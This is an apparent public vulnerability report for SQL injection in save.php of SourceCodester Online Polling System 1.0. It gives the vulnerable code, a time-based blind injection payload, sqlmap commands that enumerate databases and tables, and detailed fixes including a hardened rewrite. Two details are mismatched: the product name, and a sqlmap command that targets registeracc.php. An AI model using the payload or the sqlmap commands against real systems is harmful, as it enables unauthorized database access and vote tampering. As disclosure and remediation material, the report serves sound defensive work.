
SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability #3

Open
ppp-src opened this issue May 18, 2024 · 0 comments

Comments

@ppp-src
Owner

ppp-src commented May 18, 2024

SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability

NAME OF AFFECTED PRODUCT(S)

  • Online Examination System Project

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • polaris0x1

Vulnerable File

  • save.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • There is a typical SQL injection vulnerability in the save.php file of the project "Online Polling System". This vulnerability stems from the application's failure to properly sanitize and validate user input, which is used directly in database queries. In this code snippet, the variable $vote is user input obtained directly through $_REQUEST['vote']. Because the content of $vote is never checked or escaped, a malicious user can alter the structure of the SQL query by constructing special input values, thereby executing unintended SQL operations.

Vulnerability code snippets

    <?php
    require('connection.php');
    // Tainted input: taken straight from GET, POST or cookie data with no validation
    $vote = $_REQUEST['vote'];

    // The raw value is interpolated into the SQL string, so it becomes part of the query itself
    mysqli_query($conn, "UPDATE tbCandidates SET candidate_cvotes=candidate_cvotes+1 WHERE candidate_name='$vote'");

    mysqli_close($conn);
    ?>
  • In the above code snippet, the variable $vote is user input obtained directly through $_REQUEST['vote']. Because the content of $vote is never checked or escaped, a malicious user can alter the structure of the SQL query by constructing special input values, thereby performing unintended SQL operations.

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of the "Online Polling System" project, polaris0x1 discovered a significant vulnerability in the save.php file. The vote parameter lacks proper sanitization and validation, allowing attackers to inject malicious SQL queries and gain unauthorized database access. This can result in the modification of voting data and potential exposure of sensitive information. Immediate measures are needed to address this flaw and ensure data security and fairness in the voting process.

No login or authorization is required to exploit this vulnerability

Vulnerability details and POC

Vulnerability type:

  • Time based blind SQL injection

Vulnerability location:

  • 'vote' parameter

Payload:

    vote=test' AND (SELECT 5530 FROM (SELECT(SLEEP(5)))wnWB)-- AWBQ
  • This payload means that if the injected SQL condition is true, the database executes the SLEEP(5) function, pausing the query for 5 seconds. The delay is what makes the injection detectable: observing the response time shows whether the injected SQL statement was executed.

Database Information:

  • DBMS: MySQL>=5.0.12
  • Web server operating system: Windows
  • Web application technology: PHP 5.5.38, Apache 2.4.23
    Parameter: vote (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: vote=test' AND (SELECT 5530 FROM (SELECT(SLEEP(5)))wnWB)-- AWBQ

  • The above shows the payload identified by running sqlmap.
  • List all databases on the server using sqlmap with the constructed payload:
    python sqlmap.py -u "http://192.168.31.216:8115/save.php?vote=test" --batch --risk=3 --level=5 --dbs
  • List all table names in the specified database 'poll':
    python sqlmap.py -u "192.168.31.216:8115/registeracc.php" --data="firstname=11&lastname=11&email=123@qq.com&password=123456&ConfirmPassword=123456&submit=Register Account" -p email --dbms=mysql --risk=3 --level=5 --batch -D poll --tables

Suggested repair

Regarding the SQL injection vulnerability discovered in the 'save.php' file of the 'Online Polling System' project, the following are several practical suggested fixes:

1 Using parameterized queries (Prepared Statements)

  • One of the most effective ways to prevent SQL injection attacks is to use parameterized queries. This method ensures that the structure of the SQL command cannot be altered by incoming data. In PHP, either PDO (PHP Data Objects) or the MySQLi extension can be used to implement parameterized queries.

Example code (using PDO):

    // $pdo is a PDO connection; the bound value is sent separately from the SQL text
    $stmt = $pdo->prepare('UPDATE tbCandidates SET candidate_cvotes = candidate_cvotes + 1 WHERE candidate_name = :vote');
    $stmt->execute(['vote' => $vote]);

Example code (using MySQLi):

    // $conn is a mysqli connection, as created by connection.php
    $stmt = $conn->prepare('UPDATE tbCandidates SET candidate_cvotes = candidate_cvotes + 1 WHERE candidate_name = ?');
    $stmt->bind_param('s', $vote); // 's' binds $vote as a string
    $stmt->execute();

2 Strengthen input validation

  • Strict validation is crucial before processing any user input. Determine whether the input data conforms to the expected format and type, for example, if the 'vote' parameter should be a known candidate name, ensure that the input value strictly matches the candidate list.

Example code:

    $allowed_votes = ['Candidate1', 'Candidate2', 'Candidate3']; // Candidate list
    if (in_array($vote, $allowed_votes, true)) { // strict comparison: no type juggling
        // Perform database update operations
    } else {
        // Handle invalid input
        echo "Invalid vote.";
    }

3 Implement appropriate error handling

  • Avoid displaying SQL error messages in the user interface, which can be achieved through appropriate error handling. Ensure that error messages do not expose sensitive information and instead provide universal user-friendly errors.

Example code:

    try {
        // Perform database operations
    } catch (PDOException $e) {
        // Record the error in the log file
        error_log($e->getMessage());
        // Display a general error message to the user
        echo "An error occurred. Please try again later.";
    }

4 Minimum permission principle

  • Ensure that the database account used by the application only has the minimum permissions to perform necessary operations. For example, if the application does not require permission to delete records, then the account should not have this permission.
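
The four measures above combined into one hardened replacement for save.php. This is an added example, not code from the issue or from the Online Polling System project. It assumes, as the vulnerable snippet does, that connection.php defines $conn as a mysqli connection; the table and column names come from the issue, while the length limit, the messages, the database account name 'poll_app' in the grant comment and the choice to read the vote from POST only are assumptions made for this example.

```php
<?php
// Hardened save.php (added example, not the project's own code).
// Assumes connection.php provides $conn as a mysqli connection.
//
// Step 4, least privilege, is a one-time administrative task rather than
// application code. Example grant (account name is an assumption):
//   GRANT SELECT, UPDATE ON poll.tbCandidates TO 'poll_app'@'localhost';
// SELECT is needed for the WHERE clause, UPDATE for the counter; nothing else.

declare(strict_types=1);

require('connection.php');

// Make mysqli throw exceptions instead of returning false, so every database
// failure reaches the catch block below rather than being silently ignored.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Record one vote for the named candidate.
 * Returns true only when exactly one candidate row was updated.
 */
function record_vote(mysqli $conn, string $vote): bool
{
    // Step 2: shape validation. A candidate name is a short printable string;
    // anything else is rejected before it reaches the database.
    if ($vote === '' || strlen($vote) > 64 || !ctype_print($vote)) {
        return false;
    }

    // Step 1: parameterized query. The name travels as a bound value, so it
    // can never change the structure of the UPDATE statement.
    $stmt = $conn->prepare(
        'UPDATE tbCandidates SET candidate_cvotes = candidate_cvotes + 1 WHERE candidate_name = ?'
    );
    $stmt->bind_param('s', $vote);
    $stmt->execute();

    // An unknown candidate matches no row; treat that as an invalid vote
    // rather than reporting success.
    $updated = $stmt->affected_rows === 1;
    $stmt->close();
    return $updated;
}

try {
    // Read the vote from the POST body only. $_REQUEST also accepts GET and
    // cookie values, which widens the input surface for no benefit.
    $vote = $_POST['vote'] ?? '';
    // is_string guards against vote[]=... arriving as an array.
    if (!is_string($vote) || !record_vote($conn, $vote)) {
        http_response_code(400);
        echo 'Invalid vote.';
    } else {
        echo 'Vote recorded.';
    }
} catch (mysqli_sql_exception $e) {
    // Step 3: log the detail for operators, show the user nothing that
    // describes the query or the schema.
    error_log('save.php: ' . $e->getMessage());
    http_response_code(500);
    echo 'An error occurred. Please try again later.';
} finally {
    mysqli_close($conn);
}
```

Checking affected_rows replaces the hard-coded candidate list from step 2 with the database's own candidate table as the allowlist, so adding a candidate does not require a code change, while the prepared statement still guarantees that the submitted name can only ever be compared, never executed.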